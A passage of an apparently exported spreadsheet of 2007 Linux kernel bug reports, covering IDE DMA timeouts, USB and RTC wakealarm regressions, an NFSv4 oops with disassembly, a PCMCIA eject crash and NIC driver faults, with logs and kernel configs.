    <t>Hardware Environment: lspci 00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 03) 00:0e.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 00:0f.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 08) 00:14.0 ISA bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 02) 00:14.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01) 00:14.2 USB Controller: Intel Corporation 82371AB/EB/MB PIIX4 USB (rev 01) 00:14.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 02) 01:00.0 VGA compatible controller: Matrox Graphics, Inc. MGA G400/G450 (rev 04) 1 hard drive on ide1 and 1 CompactFlash on ide1 Problem Description: My CampactFlash is my primary hard drive and don't support DMA. My hard drive support DMA. When I boot I have a timeout : dmesg : ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx VP_IDE: IDE controller at PCI slot 0000:00:07.1 VP_IDE: chipset revision 6 VP_IDE: not 100% native mode: will probe irqs later VP_IDE: VIA vt82c686b (rev 40) IDE UDMA100 controller on pci0000:00:07.1 ide0: BM-DMA at 0xd000-0xd007, BIOS settings: hda:pio, hdb:pio ide1: BM-DMA at 0xd008-0xd00f, BIOS settings: hdc:DMA, hdd:DMA Probing IDE interface ide0... Probing IDE interface ide1... hdc: KINGSTON, ATA DISK drive hdd: IC25N030ATCS04-0, ATA DISK drive ide1 at 0x170-0x177,0x376 on irq 15 Probing IDE interface ide0... hdc: max request size: 128KiB hdc: 2030112 sectors (1039 MB) w/1KiB Cache, CHS=2014/16/63, DMA hdc:&lt;4&gt;hdc: dma_timer_expiry: dma status == 0x61 hdc: DMA timeout error hdc: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hdc: DMA disabled hdd: DMA disabled ide1: reset: success hdc1 hdc2 hdc3 hdc4 &lt;&lt;4&gt;hdc: dma_timer_expiry: dma status == 0x21 hdc: DMA timeout error hdc: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hdc: DMA disabled ide1: reset: success hdc5&lt;4&gt;hdc: dma_timer_expiry: dma status == 0x21 hdc: DMA timeout error hdc: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hdc: DMA disabled ide1: reset: success hdc6 &gt; hdd: max request size: 128KiB hdd: 58605120 sectors (30005 MB) w/1768KiB Cache, CHS=58140/16/63 hdd: cache flushes not supported hdd: hdd1 hdd2 hdd3 .... hdc: dma_timer_expiry: dma status == 0x21 hdc: DMA timeout error hdc: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } ide: failed opcode was: unknown hdc: DMA disabled ide1: reset: success My Kernel is compiled with : # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_IDEPCI_PCIBUS_ORDER=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_ONLYDISK=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set CONFIG_BLK_DEV_ATIIXP=y # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_CS5535 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_JMICRON is not set # CONFIG_BLK_DEV_SC1200 is not set CONFIG_BLK_DEV_PIIX=y # CONFIG_BLK_DEV_IT8213 is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y # CONFIG_BLK_DEV_TC86C001 is not set # CONFIG_IDE_ARM is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set # CONFIG_BLK_DEV_HD is not set If I boot with append option "ide=nodma", I have no error but I can't activate DMA on the hard drive : hdparm -d1 /dev/hdd doesn't work.</t>
  </si>
  <si>
    <t>2.6.23-rc5</t>
  </si>
  <si>
    <t>after update from 2.6.20 to 2.6.21 or higher usb doesn't work</t>
  </si>
  <si>
    <t>2.6.21 or higher</t>
  </si>
  <si>
    <t>2007-09-03 19:12 UTC</t>
  </si>
  <si>
    <t>hansen12345</t>
  </si>
  <si>
    <t>2008-02-11 01:20 UTC</t>
  </si>
  <si>
    <t>hello, after update the kernel version from 2.6.20 to 2.6.21 or higher the usb connector doesn't work. when i start kernel 2.6.21 or 2.6.23-rc4, the loading stop for four or five seconds with a message: "usb can`t set config #0, error -110". the system starts nevertheless but not usb device is recognised. i have build the kernel 2.6.23-rc4 with CONFIG_USB_DEBUG on for a better logfile.</t>
  </si>
  <si>
    <t>got a kernel panic with 2.6.23-rc5 - something concerning interrupts</t>
  </si>
  <si>
    <t>2007-09-04 04:32 UTC</t>
  </si>
  <si>
    <t>2007-11-02 09:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.23-rc4 Distribution:Slackware 10.2 Hardware Environment: VIA KT133 based mobo, AMD Duron 900 MHz, 512MB RAM, 3x Realtek 8139 NICs, PATA Seagate 320GB using libata Software Environment: Problem Description:kernel panic; message said something about interrupts of one of the NICs, so I'm not sure if it is the 8139too kernel module, ACPI and/or interrupt code. Because the machine is something of a server, I didn't had time to take picture/copy the message by hand, so I just power-cycled it. Altough there are three "exactly the same" NICs, driven by the 8139too module, this is the first time such an error is encountered, and such a config has been running fine for more than 2 years (recently changed the mobo). Any help on how to debug will be greatly appreciated! Sorry that this bugreport is mostly noise, as there is no actual data, but I'll make the kernel use some higher-info-density console video mode for starters, so I can post the actual kernel panic message, if I can reproduce it. Steps to reproduce:unknown</t>
  </si>
  <si>
    <t>LSIFC909 card don't recognice any more my FC drives</t>
  </si>
  <si>
    <t>2.6.18 and 2.6.22.6</t>
  </si>
  <si>
    <t>2007-09-07 05:42 UTC</t>
  </si>
  <si>
    <t>Egon</t>
  </si>
  <si>
    <t>2007-11-16 22:45 UTC</t>
  </si>
  <si>
    <t>Hello, I had upgraded my server from debian sarge (kernel 2.6.8) to debian etch (kernel 2.6.18). Since this upgrade I can't any more see my fc-drives. I get no failures during the system boot. It seems that the card would be reginized correct, but as I wrote, I can't see any drives. When I boot the server with debian sarge (kernel 2.6.8) all works fine ..;-) I had compile a new kernel 2.6.22.6 also with MPT- direct compiled into the kernel (not as moduls) and tries with them also.. but no success. Here is my config: HBA: LSIFC909 Disk: 1 x SEGATE CHEETAH 18 GB 10Krpm + 2 x HITACHI 146GB 15Krpm drives in AL (works fine with kernel 2.6.8...) I send you here any logs: lspci: 00:00.0 Host bridge: Intel Corporation 82865G/PE/P DRAM Controller/Host-Hub Interface (rev 02) 00:01.0 PCI bridge: Intel Corporation 82865G/PE/P PCI to AGP Controller (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801EB/ER (ICH5/ICH5R) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev c2) 00:1f.0 ISA bridge: Intel Corporation 82801EB/ER (ICH5/ICH5R) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801EB/ER (ICH5/ICH5R) IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801EB/ER (ICH5/ICH5R) SMBus Controller (rev 02) 01:00.0 VGA compatible controller: nVidia Corporation NV20 [GeForce3 Ti 500] (rev a3) 02:02.0 SCSI storage controller: LSI Logic / Symbios Logic FC909 Fibre Channel Adapter (rev 01) 02:04.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 0a) 02:04.1 Input device controller: Creative Labs SB Live! Game Port (rev 0a) 02:08.0 Ethernet controller: Intel Corporation 82562EZ 10/100 Ethernet Controller (rev 02) /var/log/messages: (debuging enabled in /usr/src/linux/drivers/message/fusion/Makefile: EXTRA_CFLAGS += -DMPT_DEBUG_INIT) .. Sep 6 09:47:10 localhost kernel: Copyright (c) 1999-2005 LSI Logic Corporation Sep 6 09:49:22 localhost kernel: mptscsih: Unknown symbol scsi_remove_host Sep 6 09:49:22 localhost kernel: mptscsih: Unknown symbol scsi_host_put Sep 6 09:49:22 localhost kernel: mptscsih: Unknown symbol scsi_print_command Sep 6 09:49:22 localhost kernel: mptscsih: Unknown symbol scsi_adjust_queue_depth Sep 6 09:50:09 localhost kernel: SCSI subsystem initialized Sep 6 09:50:53 localhost kernel: mptfc: Unknown symbol fc_attach_transport Sep 6 09:50:53 localhost kernel: mptfc: Unknown symbol fc_remote_port_add Sep 6 09:50:53 localhost kernel: mptfc: Unknown symbol fc_remove_host Sep 6 09:50:53 localhost kernel: mptfc: Unknown symbol fc_remote_port_delete Sep 6 09:50:53 localhost kernel: mptfc: Unknown symbol fc_release_transport Sep 6 09:50:53 localhost kernel: mptfc: Unknown symbol fc_remote_port_rolechg Sep 6 09:50:53 localhost kernel: mptfc: Unknown symbol scsi_is_fc_rport Sep 6 09:51:28 localhost kernel: Fusion MPT misc device (ioctl) driver 3.04.01 Sep 6 09:51:28 localhost kernel: mptctl: Registered with Fusion MPT base driver Sep 6 09:51:28 localhost kernel: mptctl: /dev/mptctl @ (major,minor=10,220) Sep 6 09:52:08 localhost kernel: Fusion MPT FC Host driver 3.04.01 Sep 6 09:52:08 localhost kernel: mptbase: Initiating ioc0 bringup Sep 6 09:52:09 localhost kernel: scsi0 : ioc0: LSIFC909, FwRev=01000000h, Ports=1, MaxQ=1023, IRQ=201 Sep 6 09:54:37 localhost mpt-statusd: detected non-optimal RAID status loaded modules: mptfc 14468 0 mptscsih 21696 1 mptfc mptbase 46176 2 mptfc,mptscsih scsi_transport_fc 28544 1 mptfc scsi_mod 124168 3 mptfc,mptscsih,scsi_transport_fc</t>
  </si>
  <si>
    <t>/proc/acpi/alarm worked; update to 2.6.22.2 and /sys/class/rtc/rtc0/wakealarm don't</t>
  </si>
  <si>
    <t>2007-09-08 09:29 UTC</t>
  </si>
  <si>
    <t>Craig Huff</t>
  </si>
  <si>
    <t>2008-01-24 15:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.20 Distribution: FC6 Hardware Environment: ASUS A8N-SLI mobo, Athlon 64 3200+, PATA Disk Software Environment: FC6, MythTV 0.20.2-164 Problem Description: Change in kernel code from support for /proc/acpi/alarm to /sys/class/rtc/rtc0/wakealarm and supporting code borked working system. Will no longer wake at set time. Time set &lt;&gt; time reported by cat /sys.../wakealarm. Return value off by large constant. Note: Mobo doesn't support month, day, or year in alarm setting. Steps to reproduce: Before upgrade from 2.6.20 to 2.6.22.2, suspend-to-disk with powerdown to standby would wake at time echoed into /proc/acpi/alarm. Change of wakeup time setting code to echo 0 to /sys/class/rtc/rtc0/wakealarm followed by echo of seconds since epoch of desired wakeup time under 2.6.22.2 does not work. System will not wake up at specified time. Will wake by keyboard keystroke, such as Ctrl+Esc. Tried enabling APM (BIOS) alarm setting and all entries under /proc/acpi/wakeup (all on at once), but no improvement. Test sequence: # echo 0 &gt; /sys/class/rtc/rtc0/wakealarm # t=`date +%s`; w=`expr $t + 60`; echo $w &gt; /sys/class/rtc/rtc0/wakealarm # echo $w 1189268800 # cat /sys/class/rtc/rtc0/wakealarm 2076101696 # expr 2076101696 - 1189268800 886832896 &lt;invoke your favorite code to suspend to disk and power down system leaving standby power on&gt; &lt;wait&gt; &lt;wait some more&gt; &lt;hit power on button&gt;</t>
  </si>
  <si>
    <t>Mutex documentation is unclear about bottom halves, tasklets and timers</t>
  </si>
  <si>
    <t>2.6.23-rc5-git1</t>
  </si>
  <si>
    <t>2007-09-08 23:05 UTC</t>
  </si>
  <si>
    <t>2007-10-19 17:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none Problem Description: mutex documentation is unclear about bottom halves, tasklets and timers. Signed-off-by: Matti Linnanvuori &lt;mattilinnanvuori@yahoo.com&gt; --- Documents/Documentation-mutex-design.txt 2007-09-09 08:43:02.286874500 +0300 +++ Documents-patched/Documentation-mutex-design.txt 2007-09-09 08:49:20.912055000 +0300 @@ -90,7 +90,7 @@ of advantages of mutexes: * - task may not exit with mutex held * - memory areas where held locks reside must not be freed * - held mutexes must not be reinitialized - * - mutexes may not be used in irq contexts + * - mutexes may not be used in interrupt, bottom half, tasklet or timer contexts furthermore, there are also convenience features in the debugging code: @@ -107,7 +107,7 @@ Disadvantages ------------- The stricter mutex API means you cannot use mutexes the same way you -can use semaphores: e.g. they cannot be used from an interrupt context, +can use semaphores: e.g. they cannot be used from an interrupt, bottom half, tasklet or timer context, nor can they be unlocked from a different context that which acquired it. [ I'm not aware of any other (e.g. performance) disadvantages from using mutexes at the moment, please let me know if you find any. ]</t>
  </si>
  <si>
    <t>oops in nfs4_cb_recall...</t>
  </si>
  <si>
    <t>2007-09-10 07:35 UTC</t>
  </si>
  <si>
    <t>Daniel J Blueman</t>
  </si>
  <si>
    <t>2008-02-11 02:44 UTC</t>
  </si>
  <si>
    <t>Distribution: - Ubuntu Gutsy Gibbon Tribe 4/5 Hardware Environment: - x86-64 on server and client B; i686 on client A - via small gigabit network Problem Description: When accessing a directory inode from a single other client, NFSv4 callbacks catastrophically failed [1] on the NFS server with plain 2.6.23-rc4; clients are both 2.6.22 (Ubuntu Gutsy build) - one x86-64 and one i686. Decoded xprt_reserve() at [2]. Let me know if more info is needed. Most recent kernel where this bug did not occur: - seen twice with 2.6.23-rc4, so perhaps 2.6.22/23 is stable in this respect - happened twice in two weeks of running 2.6.23-rc4 with 2 clients and daily activity Steps to reproduce: 1. login to client A with delegations correctly working on NFSv4 -&gt; ie ensure 'clientaddr' is set when mounting 2. use (eg) files and directories in user's homedir 3. shutdown client A (perhaps unmounting fails?) 4. login to client B w/ NFSv4 and delegations working &lt;oops on server&gt; --- [1] general protection fault: 0000 [1] SMP CPU 1 Modules linked in: dvb_usb_dtt200u dvb_usb dvb_core firmware_class i2c_core uhci_hcd ehci_hcd usbcore Pid: 24009, comm: nfs4_cb_recall Not tainted 2.6.23-rc4-109 #1 RIP: 0010:[xprt_reserve+217/384] [xprt_reserve+217/384] xprt_reserve+0xd9/0x180 RSP: 0018:ffff81003905de20 EFLAGS: 00010286 RAX: ffff81000a2600a8 RBX: ffff81003a1d8780 RCX: 4d00000000610d00 RDX: 0b66656403100000 RSI: 0000000000000000 RDI: ffff81000a260000 RBP: ffff81003ebf3000 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000001 R12: ffff81000a260000 R13: ffff81003ebf3460 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff81003fdd4180(0000) knlGS:0000000000000000 CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b CR2: 00002b456c102468 CR3: 000000003e047000 CR4: 00000000000006e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 Process nfs4_cb_recall (pid: 24009, threadinfo ffff81003905c000, task ffff81000a358000) Stack: ffff810032360040 0000000000000000 ffff81003a1d8780 ffffffff804d2170 ffff81003a1d8870 ffffffff80483a3b 0000000000000000 ffff81003a1d8780 ffff81003a1d8780 ffffffff804d2170 ffff81003905ded0 ffffffff8047d876 Call Trace: [__rpc_execute+107/656] __rpc_execute+0x6b/0x290 [rpc_do_run_task+118/208] rpc_do_run_task+0x76/0xd0 [rpc_call_sync+21/64] rpc_call_sync+0x15/0x40 [nfsd4_cb_recall+258/304] nfsd4_cb_recall+0x102/0x130 [do_recall+0/32] do_recall+0x0/0x20 [do_recall+17/32] do_recall+0x11/0x20 [kthread+75/128] kthread+0x4b/0x80 [child_rip+10/18] child_rip+0xa/0x12 [kthread+0/128] kthread+0x0/0x80 --- [2] dumping the code at xprt_reserve+0xd9: (note, taken from a rebuild w/ '-g', so differing offsets, but registers match above) ffffffff8047f330 &lt;xprt_reserve&gt;: xprt_reserve(): 2.6.23-rc4/net/sunrpc/xprt.c:799 ffffffff8047f330: 48 83 ec 28 sub $0x28,%rsp ffffffff8047f334: 48 89 5c 24 08 mov %rbx,0x8(%rsp) ffffffff8047f339: 48 89 6c 24 10 mov %rbp,0x10(%rsp) ffffffff8047f33e: 48 89 fb mov %rdi,%rbx ffffffff8047f341: 4c 89 6c 24 20 mov %r13,0x20(%rsp) ffffffff8047f346: 4c 89 64 24 18 mov %r12,0x18(%rsp) 2.6.23-rc4/net/sunrpc/xprt.c:800 ffffffff8047f34b: 48 8b 47 20 mov 0x20(%rdi),%rax ffffffff8047f34f: 48 8b 40 60 mov 0x60(%rax),%rax 2.6.23-rc4/net/sunrpc/xprt.c:802 ffffffff8047f353: c7 47 30 fb ff ff ff movl $0xfffffffb,0x30(%rdi) 2.6.23-rc4/net/sunrpc/xprt.c:803 ffffffff8047f35a: 4c 8d a8 60 04 00 00 lea 0x460(%rax),%r13 ffffffff8047f361: 4c 89 ef mov %r13,%rdi ffffffff8047f364: e8 57 ec 01 00 callq ffffffff8049dfc0 &lt;_spin_lock&gt; do_xprt_reserve(): 2.6.23-rc4/net/sunrpc/xprt.c:776 ffffffff8047f369: 48 83 7b 28 00 cmpq $0x0,0x28(%rbx) 2.6.23-rc4/net/sunrpc/xprt.c:773 ffffffff8047f36e: 48 8b 43 20 mov 0x20(%rbx),%rax ffffffff8047f372: 48 8b 68 60 mov 0x60(%rax),%rbp 2.6.23-rc4/net/sunrpc/xprt.c:775 ffffffff8047f376: c7 43 30 00 00 00 00 movl $0x0,0x30(%rbx) 2.6.23-rc4/net/sunrpc/xprt.c:776 ffffffff8047f37d: 74 21 je ffffffff8047f3a0 &lt;xprt_reserve+0x70&gt; xprt_reserve(): 2.6.23-rc4/net/sunrpc/xprt.c:805 ffffffff8047f37f: 4c 89 ef mov %r13,%rdi 2.6.23-rc4/net/sunrpc/xprt.c:806 ffffffff8047f382: 48 8b 5c 24 08 mov 0x8(%rsp),%rbx ffffffff8047f387: 48 8b 6c 24 10 mov 0x10(%rsp),%rbp ffffffff8047f38c: 4c 8b 64 24 18 mov 0x18(%rsp),%r12 ffffffff8047f391: 4c 8b 6c 24 20 mov 0x20(%rsp),%r13 ffffffff8047f396: 48 83 c4 28 add $0x28,%rsp 2.6.23-rc4/net/sunrpc/xprt.c:805 ffffffff8047f39a: e9 11 eb 01 00 jmpq ffffffff8049deb0 &lt;_spin_unlock&gt; ffffffff8047f39f: 90 nop do_xprt_reserve(): 2.6.23-rc4/net/sunrpc/xprt.c:777 ffffffff8047f3a0: 48 8d 85 60 03 00 00 lea 0x360(%rbp),%rax 2.6.23-rc4/net/sunrpc/xprt.c:778 ffffffff8047f3a7: 48 3b 85 60 03 00 00 cmp 0x360(%rbp),%rax ffffffff8047f3ae: 75 34 jne ffffffff8047f3e4 &lt;xprt_reserve+0xb4&gt; 2.6.23-rc4/net/sunrpc/xprt.c:785 ffffffff8047f3b0: f6 05 d9 26 5f 00 01 testb $0x1,0x5f26d9(%rip) # ffffffff80a71a90 &lt;rpc_debug&gt; ffffffff8047f3b7: 0f 85 e0 00 00 00 jne ffffffff8047f49d &lt;xprt_reserve+0x16d&gt; 2.6.23-rc4/net/sunrpc/xprt.c:788 ffffffff8047f3bd: 48 8d bd e0 02 00 00 lea 0x2e0(%rbp),%rdi 2.6.23-rc4/net/sunrpc/xprt.c:786 ffffffff8047f3c4: c7 43 30 f5 ff ff ff movl $0xfffffff5,0x30(%rbx) 2.6.23-rc4/net/sunrpc/xprt.c:787 ffffffff8047f3cb: 48 c7 83 e0 00 00 00 movq $0x0,0xe0(%rbx) ffffffff8047f3d2: 00 00 00 00 2.6.23-rc4/net/sunrpc/xprt.c:788 ffffffff8047f3d6: 31 c9 xor %ecx,%ecx ffffffff8047f3d8: 31 d2 xor %edx,%edx ffffffff8047f3da: 48 89 de mov %rbx,%rsi ffffffff8047f3dd: e8 2e 4a 00 00 callq ffffffff80483e10 &lt;rpc_sleep_on&gt; ffffffff8047f3e2: eb 9b jmp ffffffff8047f37f &lt;xprt_reserve+0x4f&gt; 2.6.23-rc4/net/sunrpc/xprt.c:779 ffffffff8047f3e4: 4c 8b a5 60 03 00 00 mov 0x360(%rbp),%r12 ffffffff8047f3eb: 49 81 ec a8 00 00 00 sub $0xa8,%r12 ffffffff8047f3f2: 49 8d 84 24 a8 00 00 lea 0xa8(%r12),%rax ffffffff8047f3f9: 00 list_del_init(): 2.6.23-rc4/include/linux/list.h:256 ffffffff8047f3fa: 49 8b 8c 24 a8 00 00 mov 0xa8(%r12),%rcx ffffffff8047f401: 00 xprt_request_init(): 2.6.23-rc4/net/sunrpc/xprt.c:828 ffffffff8047f402: 4c 89 e7 mov %r12,%rdi list_del_init(): 2.6.23-rc4/include/linux/list.h:256 ffffffff8047f405: 48 8b 50 08 mov 0x8(%rax),%rdx &lt;--------- failing address at xprt_reserve+0xd9 __list_del(): 2.6.23-rc4/include/linux/list.h:157 ffffffff8047f409: 48 89 51 08 mov %rdx,0x8(%rcx) 2.6.23-rc4/include/linux/list.h:158 ffffffff8047f40d: 48 89 0a mov %rcx,(%rdx) INIT_LIST_HEAD(): 2.6.23-rc4/include/linux/list.h:33 ffffffff8047f410: 48 89 40 08 mov %rax,0x8(%rax) 2.6.23-rc4/include/linux/list.h:32 ffffffff8047f414: 49 89 84 24 a8 00 00 mov %rax,0xa8(%r12) ffffffff8047f41b: 00 do_xprt_reserve():</t>
  </si>
  <si>
    <t>running "pccardctl eject" results in kernel BUG</t>
  </si>
  <si>
    <t>2.6.21.7</t>
  </si>
  <si>
    <t>2007-09-13 03:13 UTC</t>
  </si>
  <si>
    <t>2007-11-28 22:26 UTC</t>
  </si>
  <si>
    <t>Running "pccacrdctl eject" once resulted in the following kernel BUG. pccard: card ejected from slot 1 uhci_hcd 0000:07:00.0: remove, state 4 usb usb5: USB disconnect, address 1 uhci_hcd 0000:07:00.0: HCRESET not completed yet! uhci_hcd 0000:07:00.0: USB bus 5 deregistered ACPI: PCI interrupt for device 0000:07:00.0 disabled ehci_hcd 0000:07:00.2: remove, state 4 usb usb6: USB disconnect, address 1 ehci_hcd 0000:07:00.2: dma_pool_destroy ehci_qh, 32785c32 busy BUG: unable to handle kernel paging request at virtual address 37303a34 printing eip: c0242ca0 *pde = 00000000 Oops: 0002 [#1] Modules linked in: ndiswrapper cpufreq_stats nls_iso8859_1 nls_cp437 vfat fat sco rfcomm l2cap hci_usb bluetooth ohci1394 ieee1394 snd_pcm_oss snd_mixer_oss snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_bt_sco snd_hwdep snd_intel8x0m snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_timer snd soundcore snd_page_alloc tun xt_mac ipt_LOG xt_limit nf_conntrack_ipv4 xt_state nf_conntrack xt_tcpudp iptable_filter ip_tables x_tables rtc evdev lt_hotswap squashfs zlib_inflate fuse unionfs sd_mod usb_storage scsi_mod usbhid uhci_hcd ehci_hcd button yenta_socket rsrc_nonstatic pcmcia_core psmouse e1000 loop ibm_acpi backlight battery radeonfb cfbcopyarea cfbimgblt cfbfillrect fbcon font bitblit softcursor fb CPU: 0 EIP: 0060:[&lt;c0242ca0&gt;] Tainted: P VLI EFLAGS: 00010286 (2.6.21.7-1 #1) EIP is at dma_pool_destroy+0xb0/0x150 eax: dbbc9e40 ebx: 32785c32 ecx: 00000000 edx: 37303a30 esi: dbbc9e00 edi: e85a3048 ebp: dbbc9e40 esp: f5e7be40 ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Process pccardctl (pid: 6960, ti=f5e7a000 task=f7d5c570 task.ti=f5e7a000) Stack: c033ace8 f88fcf58 e85a30ec dbbc9e58 32785c32 dbb72cd4 dbb72c00 dbb72c00 c1d2a448 f88fabb5 dbb72c00 dbb72cd4 dbb72c00 f88fcce8 00000000 e85a30ec c0257c3a c03340eb f88fcf58 e85a30ec 00000004 dbb72c00 e85a3000 e85a30b0 Call Trace: [&lt;f88fabb5&gt;] ehci_mem_cleanup+0x45/0xc0 [ehci_hcd] [&lt;f88fcce8&gt;] ehci_stop+0x68/0x80 [ehci_hcd] [&lt;c0257c3a&gt;] usb_remove_hcd+0x8a/0xc0 [&lt;c0261f2d&gt;] usb_hcd_pci_remove+0x1d/0x90 [&lt;c01dece6&gt;] pci_device_remove+0x16/0x40 [&lt;c02406c8&gt;] __device_release_driver+0x68/0xa0 [&lt;c0240bf2&gt;] device_release_driver+0x22/0x40 [&lt;c024004d&gt;] bus_remove_device+0x4d/0x80 [&lt;c023e4a7&gt;] device_del+0x117/0x180 [&lt;c023e518&gt;] device_unregister+0x8/0x10 [&lt;c01db896&gt;] pci_stop_dev+0x26/0x60 [&lt;c01db9a8&gt;] pci_remove_bus_device+0x28/0xa0 [&lt;c01dba4a&gt;] pci_remove_behind_bridge+0x2a/0x40 [&lt;f88ef634&gt;] socket_shutdown+0x74/0xd0 [pcmcia_core] [&lt;f88ef6ac&gt;] socket_remove+0x1c/0x30 [pcmcia_core] [&lt;f88ef722&gt;] pcmcia_eject_card+0x62/0x70 [pcmcia_core] [&lt;f88f276d&gt;] pccard_store_eject+0x1d/0x30 [pcmcia_core] [&lt;f88f2750&gt;] pccard_store_eject+0x0/0x30 [pcmcia_core] [&lt;c023dd2d&gt;] dev_attr_store+0x2d/0x40 [&lt;c01992c6&gt;] sysfs_write_file+0xb6/0x110 [&lt;c01646c1&gt;] vfs_write+0xc1/0x160 [&lt;c0199210&gt;] sysfs_write_file+0x0/0x110 [&lt;c0164cb1&gt;] sys_write+0x41/0x70 [&lt;c0103eca&gt;] sysenter_past_esp+0x5f/0x85 ======================= Code: eb 55 8b 42 04 83 c2 04 40 75 4c 83 e9 20 85 c9 7f f0 8b 4e 08 8b 55 14 8b 45 10 8b 5e 0c 89 1c 24 e8 45 52 ec ff 8b 46 04 8b 16 &lt;89&gt; 42 04 89 10 89 f0 c7 06 00 01 10 00 c7 46 04 00 02 20 00 e8 EIP: [&lt;c0242ca0&gt;] dma_pool_destroy+0xb0/0x150 SS:ESP 0068:f5e7be40 Is there allready a patch that addresses this problem? If there is, please refer me to it, so I can integrate it with my kernel. Regards, Ruben</t>
  </si>
  <si>
    <t>network load can break nforce nic (forcedeth driver)</t>
  </si>
  <si>
    <t>2007-09-13 05:14 UTC</t>
  </si>
  <si>
    <t>edo</t>
  </si>
  <si>
    <t>2009-03-24 05:03 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: debian etch Hardware Environment: cpu AMD Athlon(tm) 64 X2 Processor 3800+ chipset: NF4-Ultra (DFI motherboard) Software Environment: kernel versions 2.6.21.5 and 2.6.22.6 Problem Description: sometimes i get message "NETDEV WATCHDOG: eth0: transmit timed out". after it network card don't work. kernel logs can be found here: http://dionis.pnz.ru/err.log http://dionis.pnz.ru/err2.log Steps to reproduce: i can't reproduce this bug, it occur randomly, but it look like related with network load. similar report is here: http://groups.google.com/group/linux.kernel/browse_thread/thread/a3c25d6593fd47b2/02f842c98b7e60c8</t>
  </si>
  <si>
    <t>atomic_ops.txt has incorrect, misleading and insufficient information</t>
  </si>
  <si>
    <t>2.6.23-rc6</t>
  </si>
  <si>
    <t>2007-09-14 14:30 UTC</t>
  </si>
  <si>
    <t>2007-10-19 22:18 UTC</t>
  </si>
  <si>
    <t>spurious completions during NCQ for Hitachi HTS722016K9SA00, DCDOC54P</t>
  </si>
  <si>
    <t>2007-09-14 22:06 UTC</t>
  </si>
  <si>
    <t>Tobias Oetiker</t>
  </si>
  <si>
    <t>2007-11-28 18:17 UTC</t>
  </si>
  <si>
